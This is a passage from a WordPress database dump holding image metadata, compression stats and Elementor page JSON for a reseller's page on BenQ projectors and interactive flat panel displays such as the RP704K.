5.jpg'),(4901,2829,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:303;s:4:\"file\";s:21:\"2019/01/rp750k-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rp750k-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rp750k-05-300x162.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"rp750k-05-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"rp750k-05-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"rp750k-05-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4902,2829,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.1877804625474635003001822042278945446014404296875;s:5:\"bytes\";i:4744;s:11:\"size_before\";i:57940;s:10:\"size_after\";i:53196;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.75;s:5:\"bytes\";i:573;s:11:\"size_before\";i:7393;s:10:\"size_after\";i:6820;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.70000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:891;s:11:\"size_before\";i:11569;s:10:\"size_after\";i:10678;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:969;s:11:\"size_before\";i:11391;s:10:\"size_after\";i:10422;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:2311;s:11:\"size_before\";i:27587;s:10:\"size_after\";i:25276;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4903,2830,'_wp_attached_file','2019/01/rp750k-06.jpg'),(4904,2830,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:358;s:4:\"file\";s:21:\"2019/01/rp750k-06.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rp750k-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rp750k-06-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"rp750k-06-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"rp750k-06-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"rp750k-06-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4905,2830,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.43767879035553658439994251239113509654998779296875;s:5:\"bytes\";i:2366;s:11:\"size_before\";i:31811;s:10:\"size_after\";i:29445;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:247;s:11:\"size_before\";i:4428;s:10:\"size_after\";i:4181;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.87999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:550;s:11:\"size_before\";i:6980;s:10:\"size_after\";i:6430;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.28000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:412;s:11:\"size_before\";i:6561;s:10:\"size_after\";i:6149;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:1157;s:11:\"size_before\";i:13842;s:10:\"size_after\";i:12685;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4906,2831,'_wp_attached_file','2019/01/rp750k-07.jpg'),(4907,2831,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:355;s:4:\"file\";s:21:\"2019/01/rp750k-07.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rp750k-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rp750k-07-300x190.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"rp750k-07-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"rp750k-07-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"rp750k-07-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4908,2831,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.09126714654352863220765357255004346370697021484375;s:5:\"bytes\";i:3588;s:11:\"size_before\";i:58904;s:10:\"size_after\";i:55316;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.45999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:507;s:11:\"size_before\";i:6799;s:10:\"size_after\";i:6292;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:860;s:11:\"size_before\";i:13533;s:10:\"size_after\";i:12673;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:523;s:11:\"size_before\";i:10955;s:10:\"size_after\";i:10432;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1698;s:11:\"size_before\";i:27617;s:10:\"size_after\";i:25919;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(5189,2885,'_elementor_edit_mode','builder'),(5190,2885,'_elementor_template_type','post'),(4915,2832,'_elementor_template_type','post'),(5176,2884,'_elementor_edit_mode','builder'),(5177,2884,'_elementor_template_type','post'),(4917,2832,'_elementor_data','[{\"id\":\"3e162d3a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"638893da\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6f668790\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BenQ<\\/h3><h3><u>Projectors<\\/u><\\/h3><h3>Business Projector (Smart Design for Presentations)<\\/h3><h4>High Brightness for Well-Lit Rooms<\\/h4><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.<\\/p><h3>Interactive Classroom Projectors<\\/h3><h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms<\\/h4><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short \\/ ultra-short throw projection based on brilliant laser or lamp light sources.<\\/p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM<\\/sup><\\/li><li>High Brightness from 3000-3500 ANSI Lumens<\\/li><li>High resolution with (Ultra) Short Throw<\\/li><li>Scalable for Wireless Use and Interactivity<\\/li><\\/ul><h3><u>Interactive Flat Panel<\\/u><\\/h3><h4>Meeting Room &amp; Boardroom<\\/h4><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.<\\/p><h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G<\\/h4><p><strong>Work Collaboratively and Conduct Business Efficiently<\\/strong><br \\/>The RP840G is a modern enterprise\\u2019s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.<\\/p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQ\\u2019s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.<\\/p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.<\\/p><h4>How BenQ Display turns meeting rooms into places of efficiency<\\/h4><ul><li>Present content wirelessly and instantly with\\u00a0InstaShow<sup>TM<\\/sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly<\\/li><li>Display stunningly bright, crystal clear images with reliable, flexible\\u00a0Business Projectors\\u00a0that capture staff attention, while simultaneously streamlining company meetings<\\/li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on\\u00a0Business Projectors,\\u00a0even in large boardrooms<\\/li><li>With BenQ\\u2019s\\u00a0Smart Display\\u00a0plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"926e9aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"dc7a582\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df626b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70\\u2019\\u2019\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"86ad24f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"bd94d77\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7f09a6c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4K UHD 70\\u2019\\u2019 Education Interactive Flat Panel Display | RP704K<\\/h4><p><strong>Your Caring Mate for Enhanced Interactive Learning<\\/strong><\\/p><p><br \\/>The RP704K is designed to tap into the dynamic possibilities of the classroom and help teachers build a healthy and engaging learning environment. Not only does it come with Germ-Resistant Screen, but the Smartboard RP704K also comes installed with proficient annotation tools for enhanced class participation. It is your ultimate interactive display to achieve a touch-enhanced, smooth and fun learning experience.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45957e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"776c1c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/Board-Management-1.png\",\"id\":2817}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"022d2bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1dc7d9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2005776\",\"elType\":\"widget\",\"settings\":{\"title\":\"Create a Healthy Learning Environment for Students\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c85d973\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0e86a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"879bd0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/edu-rp750k-21-1.png\",\"id\":2818}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e6f5604\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf641a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Germ-Resistant Screen<\\/strong><br \\/>The Germ-Resistant Screen is empowered by a multilayer coating of the non-toxic, enduring nano ionic silver agent that kills most germs accumulating on screen surfaces and prevent cross-infection or epidemic in classrooms. The ionic silver\\u2019s antimicrobial feature remains effective even after thorough cleaning or long periods of use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"170aa2a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8471643\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f2141cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>* TUV Test Confirmed<\\/strong><br \\/>TUV is the world\\u2019s leading inspection and verification company, providing internationally approved testing services to verify product quality and performance. Placing our trust TUV\\u2019s best-in-class facilities and world-recognized integrity, we had their experts rigidly evaluate the screen\\u2019s antimicrobial efficacy. Proved by the JIS Z 2801:2010 testing methods, the result shows that BenQ\\u2019s AG+ Screen can effectively restrain the microbial growth of Escherichia coli, Staphylococcus aureus and Pseudomonas aeruginosa. To maintain antimicrobial efficacy, please frequently wipe your touch screen with a clean, soft, lint-free cloth moisturized with a neutral detergent.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"88d63dc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9a92e2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f23907c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Smart Eye-Care Solution<\\/strong><\\/p><p>The Smart Eye-Care solution can function intuitively with the help of the embedded motion sensor. For a smooth and comfortable viewing experience, RP704K will automatically activate Flicker-Free and Low Blue Light features by detecting the movement of users close to the screen.<br \\/>*For Android devices, BenQ\\u2019s RP704K will automatically set screen backlight to a comfortable setting instead of switching to the Low Blue Light mode.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f69235\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fa63930\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8a45b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>T\\u00dcV-Certified Low Blue Light Technology<\\/strong><\\/p><p><span style=\\\"font-size: 0.875rem;\\\">Blue light emissions from displays may cause adverse health effects such as macular degeneration or disrupted melatonin secretion. BenQ\\u2019s Low Blue Light technology minimizes blue light exposure and allows for healthier time spent in front of the display, helping you create the best and most comfortable viewing experience for you and your students.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cdbbd38\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9410e4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/low-bluelight.png\",\"id\":2819}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"678cc05\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"819463a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28220a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-interactive-flat-panel-eye-care-solution-1-before.png\",\"id\":2820}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ce9aeba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"91666dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anti-Glare Display<\\/strong><\\/p><p>Screen glare can cause reflected images on the screen, making it challenging for students to see, take notes, and remain focused. The RP704K\\u2019s anti-glare glass surface can effectively reduce reflections, freeing students from excessive squinting with more legible text and clearer images, avoiding eye strain and facilitating more effective instruction.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b52bca\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cdf6ddc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"323737a\",\"elType\":\"widget\",\"settings\":{\"title\":\"EZWrite 4.1 : An Easy and Fun Annotation Solution\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d45294e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2b36de6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e1ec4b7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Intelligent Handwriting Recognition<\\/strong><\\/p><p>The Smartboard RP704K\\u2019s handwriting recognition feature allows presenters to simultaneously convert written text, numbers, forms, and drawings into legible materials without having to switch modes while effectively facilitating smooth teaching flow.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8dd3132\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"36697a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-22.jpg\",\"id\":2822}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fa56a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0939589\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0acc085\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-01.jpg\",\"id\":2823}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"54da0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6ed8ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wireless Solution for Seamless Collaboration<\\/strong><\\/p><p>InstaQShare is the software designed for seamless wireless presentation and collaboration during lectures. It allows the smooth streaming of visual, audio files and Full HD quality videos. Users can also mirror content from mobile devices, and invite up to 16 participants for seamless collaboration.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"07ba6b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"80e0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3a6161d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>20-Point Multi-Touch Interactivity<\\/strong><\\/p><p>As the leading pioneer on the market, the RP Series supports multi-touch capability up to 20 points, allowing more students to participate in a discussion and highly engaging activities at once.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"200de74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d25d95e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-02.jpg\",\"id\":2824}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"900ab72\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3d86fe0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"744c11b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Facilitate Teaching Flow with Friendly Design\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9fa4c57\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9912ac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ee788c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-08.png\",\"id\":2825}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ba4df64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Integrated Front-Facing Speaker and Pen Tray<\\/strong><\\/p><p>RP704K integrates the repositioned audio speakers with the screen-length pen tray. The two front-facing,16W speakers create better sound transmission and bring more audiovisual enjoyment to interactive learning. The pen tray offers a handy place to keep IFP stylus and other tools that help enrich and smoothen presentations, providing fast access and avoiding needless interruption.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"776468e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e3a48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-09.png\",\"id\":2826}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e34662e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Account Management System for Personalized File Management<\\/strong><\\/p><p>BenQ\'s IFPs support multi-account management through NFC technology, which allows users to directly access their personal system-setting and folders by simply scanning ID cards with the built-in sensor, as well as easily lock screens when not in use. AMS also offers instant access to major cloud storage services without having to enter password.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"91f7a3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5caf9fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2d41625\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>NFC Pen<\\/strong><\\/p><p>With a simple tap of the NFCPen at the sensor, you can instantly activate the EZWrite 4.1 annotation app, and begin to annotate with different colors. Built with NFC technology, the NFCPen is battery-free and doesn\'t require device pairing. It is also waterproof while being able to withstand long-term use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2fd161\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fb3584\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-10.png\",\"id\":2827}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"57d3c62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"751b521\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e35cd2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-04.jpg\",\"id\":2828}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"374a056\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec7b171\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Front Buttons<\\/strong> <br \\/>The front buttons, including Power, Home, Back, Setting, and Volume, further enhance the convenience of using IFPs and help teachers easily control the pace of lectures.<\\/p><p><strong>Instant Plug and Play<\\/strong> <br \\/>RP704K can save you from the hassles of complicated setup. Simply connect to a PC via USB and you\\u2019re all set to deliver compelling IFP touch-enhanced lessons.<\\/p><p><strong>Parental Control<\\/strong> <br \\/>BenQ IFPs come with website control feature that blocks certain websites by configuring proxy server settings, which is useful for preventing students from accessing inappropriate content.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c06c26c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cdee68c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c5aa819\",\"elType\":\"widget\",\"settings\":{\"title\":\"Display Management 